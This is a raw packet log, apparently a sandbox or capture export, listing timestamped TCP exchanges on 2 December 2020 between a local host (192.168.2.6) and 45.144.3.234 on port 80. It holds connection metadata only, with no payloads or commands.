                                            Dec 2, 2020 11:53:07.159962893 CET804976945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.312536001 CET4977080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.366641998 CET804977045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.366802931 CET4977080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.369520903 CET4977080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.422322035 CET804977045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.422445059 CET4977080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.475163937 CET804977045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.495950937 CET804977045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.497396946 CET804977045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.497454882 CET4977080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.497483969 CET4977080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.549890995 CET804977045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.787199020 CET4977180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.842961073 CET804977145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.843117952 CET4977180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.847165108 CET4977180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.900638103 CET804977145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.900952101 CET4977180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.952508926 CET804977145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.981039047 CET804977145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.981071949 CET804977145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:07.982620955 CET4977180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:07.983947992 CET4977180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:08.035505056 CET804977145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.125669003 CET4977280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.178973913 CET804977245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.179095984 CET4977280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.181925058 CET4977280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.234721899 CET804977245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.236537933 CET4977280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.289745092 CET804977245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.313579082 CET804977245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.313606024 CET804977245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.313694000 CET4977280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.313755035 CET4977280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.366545916 CET804977245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.514375925 CET4977380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.566468954 CET804977345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.568372965 CET4977380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.569443941 CET4977380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.633182049 CET804977345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.633315086 CET4977380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.684914112 CET804977345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.708132982 CET804977345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.708165884 CET804977345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.708303928 CET4977380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.708333015 CET4977380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:10.760040045 CET804977345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:10.967400074 CET4977480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.019642115 CET804977445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.019809961 CET4977480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.023775101 CET4977480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.075654030 CET804977445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.075879097 CET4977480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.128087997 CET804977445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.152570009 CET804977445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.152600050 CET804977445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.152683973 CET4977480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.152713060 CET4977480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.204530954 CET804977445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.394161940 CET4977580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.446897030 CET804977545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.447031975 CET4977580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.449891090 CET4977580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.502516985 CET804977545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.502696991 CET4977580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.555367947 CET804977545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.577105045 CET804977545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.577143908 CET804977545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.577261925 CET4977580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.577310085 CET4977580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.630254030 CET804977545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.888803005 CET4977680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.945538998 CET804977645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:11.945630074 CET4977680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:11.948579073 CET4977680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.003570080 CET804977645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.003648996 CET4977680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.055608988 CET804977645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.076914072 CET804977645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.076962948 CET804977645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.077054977 CET4977680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.080533981 CET4977680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.133100986 CET804977645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.333058119 CET4977880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.385174990 CET804977845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.385279894 CET4977880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.388055086 CET4977880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.440393925 CET804977845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.440466881 CET4977880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.492671013 CET804977845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.513309956 CET804977845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.513329029 CET804977845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.513420105 CET4977880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.513446093 CET4977880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.565835953 CET804977845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.712774992 CET4977980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.787625074 CET804977945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.787734985 CET4977980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.790592909 CET4977980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.842355967 CET804977945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.842472076 CET4977980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.913522005 CET804977945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.934709072 CET804977945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.934740067 CET804977945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:12.934881926 CET4977980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.934922934 CET4977980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:12.986815929 CET804977945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.196576118 CET4978180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.249593973 CET804978145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.249918938 CET4978180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.252512932 CET4978180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.304796934 CET804978145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.304941893 CET4978180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.357626915 CET804978145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.381217003 CET804978145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.381246090 CET804978145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.381318092 CET4978180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.381345987 CET4978180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.435230017 CET804978145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.633724928 CET4978380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.687006950 CET804978345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.687151909 CET4978380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.692641020 CET4978380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.745105028 CET804978345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.746243000 CET4978380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.798250914 CET804978345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.819813967 CET804978345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.819833040 CET804978345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:13.819955111 CET4978380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.820060015 CET4978380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:13.871886969 CET804978345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.057004929 CET4978780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.109174013 CET804978745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.109498978 CET4978780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.113854885 CET4978780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.165960073 CET804978745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.166322947 CET4978780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.222615957 CET804978745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.244582891 CET804978745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.244607925 CET804978745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.244713068 CET4978780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.244731903 CET4978780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.297645092 CET804978745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.447313070 CET4978980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.500498056 CET804978945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.500704050 CET4978980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.503417969 CET4978980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.555365086 CET804978945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.555636883 CET4978980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.635701895 CET804978945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.657265902 CET804978945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.657318115 CET804978945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.657484055 CET4978980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.657596111 CET4978980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.709608078 CET804978945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.860605955 CET4979180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.913461924 CET804979145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.913629055 CET4979180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.917886019 CET4979180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:14.981862068 CET804979145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:14.981981039 CET4979180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.036329985 CET804979145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.077527046 CET804979145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.077553034 CET804979145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.077670097 CET4979180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.077738047 CET4979180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.132010937 CET804979145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.322705030 CET4979380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.374680042 CET804979345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.374922037 CET4979380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.377621889 CET4979380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.432105064 CET804979345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.432190895 CET4979380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.484000921 CET804979345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.504591942 CET804979345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.504621983 CET804979345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.504764080 CET4979380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.504792929 CET4979380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.556704044 CET804979345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.704958916 CET4979580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.756844997 CET804979545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.758234024 CET4979580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.761208057 CET4979580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.813052893 CET804979545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.813211918 CET4979580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.865098000 CET804979545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.888012886 CET804979545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.888097048 CET804979545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:15.888304949 CET4979580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.888340950 CET4979580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:15.940632105 CET804979545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.067962885 CET4979780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.121232986 CET804979745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.121407986 CET4979780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.124828100 CET4979780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.177269936 CET804979745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.177397966 CET4979780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.229598045 CET804979745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.253380060 CET804979745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.253452063 CET804979745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.253591061 CET4979780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.253614902 CET4979780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.305684090 CET804979745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.440406084 CET4979980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.492430925 CET804979945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.495469093 CET4979980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.497787952 CET4979980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.550386906 CET804979945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.550455093 CET4979980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.602180958 CET804979945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.625170946 CET804979945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.625202894 CET804979945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.625375986 CET4979980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.625411034 CET4979980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.708633900 CET804979945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.810756922 CET4980080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.862827063 CET804980045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.862957001 CET4980080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.866136074 CET4980080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.918255091 CET804980045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.918363094 CET4980080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.970554113 CET804980045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.992594004 CET804980045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.992635965 CET804980045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:16.992814064 CET4980080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:16.992862940 CET4980080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:17.044872046 CET804980045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:17.188734055 CET4980280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:17.240813017 CET804980245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:17.241024971 CET4980280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:17.243861914 CET4980280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:17.295679092 CET804980245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:17.297071934 CET4980280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:17.349770069 CET804980245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:17.372365952 CET804980245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:17.372409105 CET804980245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:17.372518063 CET4980280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:17.372561932 CET4980280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:17.424592972 CET804980245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:17.556965113 CET4980480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:17.609365940 CET804980445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:17.611125946 CET4980480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:17.613940001 CET4980480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:17.666155100 CET804980445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:17.666379929 CET4980480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:17.719857931 CET804980445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:17.740863085 CET804980445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:17.740906954 CET804980445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:17.741041899 CET4980480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:17.741070032 CET4980480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:17.793421984 CET804980445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:17.993252993 CET4980580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:18.045290947 CET804980545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:18.046220064 CET4980580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:18.048964024 CET4980580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:18.101609945 CET804980545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:18.101805925 CET4980580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:18.153939009 CET804980545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:18.175754070 CET804980545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:18.175801992 CET804980545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:18.175896883 CET4980580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:18.175944090 CET4980580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:18.229546070 CET804980545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:18.365092993 CET4980680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:18.417530060 CET804980645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:18.417690992 CET4980680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:18.420409918 CET4980680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:18.474806070 CET804980645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:18.475081921 CET4980680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:18.528959990 CET804980645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:18.551269054 CET804980645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:18.551314116 CET804980645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:18.551433086 CET4980680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:18.551470041 CET4980680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:18.604935884 CET804980645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:18.738332033 CET4980780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:18.790455103 CET804980745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:18.790663004 CET4980780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:18.793375015 CET4980780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:18.845451117 CET804980745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:18.845614910 CET4980780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:18.897531033 CET804980745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:18.923599005 CET804980745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:18.923631907 CET804980745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:18.923729897 CET4980780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:18.923765898 CET4980780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:18.975704908 CET804980745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:19.263149977 CET4980980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:19.335707903 CET804980945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:19.335818052 CET4980980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:19.339299917 CET4980980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:19.393012047 CET804980945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:19.393095016 CET4980980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:19.446995974 CET804980945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:19.473929882 CET804980945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:19.473968029 CET804980945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:19.474040985 CET4980980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:19.474096060 CET4980980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:19.528292894 CET804980945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:19.656104088 CET4981080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:19.708730936 CET804981045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:19.708925009 CET4981080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:19.713181019 CET4981080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:19.765218019 CET804981045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:19.767334938 CET4981080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:19.822181940 CET804981045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:19.844413042 CET804981045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:19.844444990 CET804981045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:19.844666004 CET4981080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:19.844686985 CET4981080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:19.896265030 CET804981045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:20.168046951 CET4981280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:20.220268011 CET804981245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:20.220640898 CET4981280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:20.223712921 CET4981280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:20.275877953 CET804981245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:20.275996923 CET4981280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:20.328737020 CET804981245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:20.352596998 CET804981245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:20.352631092 CET804981245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:20.352771997 CET4981280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:20.405145884 CET804981245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:20.757963896 CET4981480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:20.810424089 CET804981445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:20.810614109 CET4981480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:20.813499928 CET4981480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:20.866005898 CET804981445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:20.866096020 CET4981480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:20.918544054 CET804981445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:20.939320087 CET804981445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:20.939351082 CET804981445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:20.939424992 CET4981480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:20.939445972 CET4981480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:20.991858959 CET804981445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:20.991895914 CET804981445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:20.991978884 CET4981480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:21.207509995 CET4981580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:21.260623932 CET804981545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:21.261465073 CET4981580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:21.264204979 CET4981580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:21.316198111 CET804981545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:21.316510916 CET4981580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:21.369070053 CET804981545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:21.393949986 CET804981545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:21.393980026 CET804981545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:21.394143105 CET4981580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:21.666687012 CET4981580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:21.720019102 CET804981545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:21.969497919 CET4981780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:22.024631977 CET804981745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:22.024760008 CET4981780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:22.027796030 CET4981780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:22.080296993 CET804981745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:22.080390930 CET4981780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:22.132992029 CET804981745.144.3.234192.168.2.6
